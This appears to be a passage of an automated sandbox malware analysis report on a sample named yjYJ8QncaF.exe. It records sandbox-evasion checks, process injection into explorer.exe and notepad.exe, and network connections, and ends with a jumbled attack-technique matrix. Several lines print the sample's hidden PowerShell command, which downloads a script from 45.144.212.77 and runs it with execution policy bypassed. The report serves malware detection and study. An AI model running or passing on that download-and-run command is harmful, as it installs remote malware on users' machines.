              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\notepad.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeWindow / User API: threadDelayed 518Jump to behavior
              Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 588Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5845Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4044Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4845Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4752Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 854Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4015
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1105
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tkaxwgf0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.dllJump to dropped file
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exe TID: 7316Thread sleep count: 518 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 5845 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 4044 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -12912720851596678s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -20291418481080494s >= -30000sJump to behavior
              Source: C:\Windows\System32\timeout.exe TID: 3744Thread sleep count: 236 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep count: 4015 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep count: 1105 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 4916Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmpJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\AppData\Local\Temp\FB99.tmpJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.tmpJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeFile opened: C:\Users\user\Jump to behavior
              Source: powershell.exe, 00000004.00000002.1927473773.0000021337E0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmCIt
              Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hGFsdZRrSFCX
              Source: powershell.exe, 00000004.00000002.1927473773.000002133679A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ULRCqEmu
              Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: crDgbVmcI
              Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ofvnmeUUnQemuHSGZapdJlW
              Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IwPvMCItcKhEBQLzIkZVtNvuGzXuu
              Source: powershell.exe, 00000004.00000002.1927473773.0000021337E0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WiHgfSdtjz
              Source: powershell.exe, 00000004.00000002.1927473773.00000213364CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CdvmCIrggdC
              Source: powershell.exe, 00000004.00000002.1927473773.000002133679A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ulBBGbJHDSeEohgFsm
              Source: powershell.exe, 00000004.00000002.1927473773.000002133679A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hgfSTuyfSAF
              Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FvmCIB
              Source: powershell.exe, 00000004.00000002.1927473773.0000021337E0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hgfsKPjwiFFfUV
              Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: byFQeMuOX
              Source: powershell.exe, 00000003.00000002.1851509576.000001D9BDF12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
              Source: powershell.exe, 00000004.00000002.1927473773.0000021337E0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hLKqSyfTrwqYZjizXaQemuP
              Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: eHGFSc
              Source: powershell.exe, 00000003.00000002.1850167036.000001D9BDD31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ame
              Source: powershell.exe, 00000004.00000002.1927473773.000002133740C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ewhgfsIrMf
              Source: powershell.exe, 00000004.00000002.1927473773.000002133740C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CFYohgfsOUscMG
              Source: powershell.exe, 00000003.00000002.1851509576.000001D9BDF7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
              Source: powershell.exe, 00000004.00000002.1927473773.000002133679A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: zpnGbAkhGFsdEezaocD
              Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RHgfS
              Source: powershell.exe, 00000004.00000002.1927473773.00000213364CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PvmCIV
              Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bHGfSfkfw
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\explorer.exeNetwork Connect: 140.82.121.3 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 140.82.121.4 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 185.199.111.133 443Jump to behavior
              Source: C:\Windows\System32\notepad.exeNetwork Connect: 192.248.189.11 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 172.67.19.24 443Jump to behavior
              Source: C:\Windows\System32\notepad.exeNetwork Connect: 80.240.16.67 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 204.79.197.203 443
              Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\notepad.exe base: 7FF7C9FC0000 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\tkaxwgf0.0.csJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 10890000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: unknown EIP: 57280000
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF7C9FC0000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 2580 base: 10890000 value: E8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 2580 base: 57280000 value: E8
              Source: C:\Windows\explorer.exeThread register set: target process: 2568Jump to behavior
              Source: C:\Windows\explorer.exeSection unmapped: C:\Windows\System32\notepad.exe base address: 7FF7C9FC0000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 10890000Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF7C9FC0000Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF7C9FC1000Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF7CA3EC000Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF7CA591000Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF7CA841000Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF7CA86C000Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF7CA86D000Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF7CA870000Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF7CA872000Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: 7FF7CA878000Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\notepad.exe base: FA17D7C010Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 57280000
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4748.tmp" "c:\Users\user\AppData\Local\Temp\zh5axkic\CSCEDA66CC27474FB7B0303F8DB836219.TMP"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" "Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 30 /nobreakJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2E.tmp" "c:\Users\user\AppData\Local\Temp\CSC726D30C7B5874E2AAAC9B4613B9BD62.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -noprofile -windowstyle hidden -command "& {invoke-webrequest -uri 'http://45.144.212.77:16000/setup' -outfile 'c:\users\user\appdata\local\temp\installer.ps1'; start-process 'powershell.exe' -argumentlist '-executionpolicy bypass -noprofile -file \"c:\users\user\appdata\local\temp\installer.ps1\"' -windowstyle hidden}"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -noprofile -windowstyle hidden -command "& {invoke-webrequest -uri 'http://45.144.212.77:16000/setup' -outfile 'c:\users\user\appdata\local\temp\installer.ps1'; start-process 'powershell.exe' -argumentlist '-executionpolicy bypass -noprofile -file \"c:\users\user\appdata\local\temp\installer.ps1\"' -windowstyle hidden}"Jump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information212
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              212
              Scripting
              1
              DLL Side-Loading
              1
              Obfuscated Files or Information
              OS Credential Dumping2
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API
              1
              DLL Side-Loading
              911
              Process Injection
              1
              DLL Side-Loading
              LSASS Memory23
              System Information Discovery
              Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Shared Modules
              2
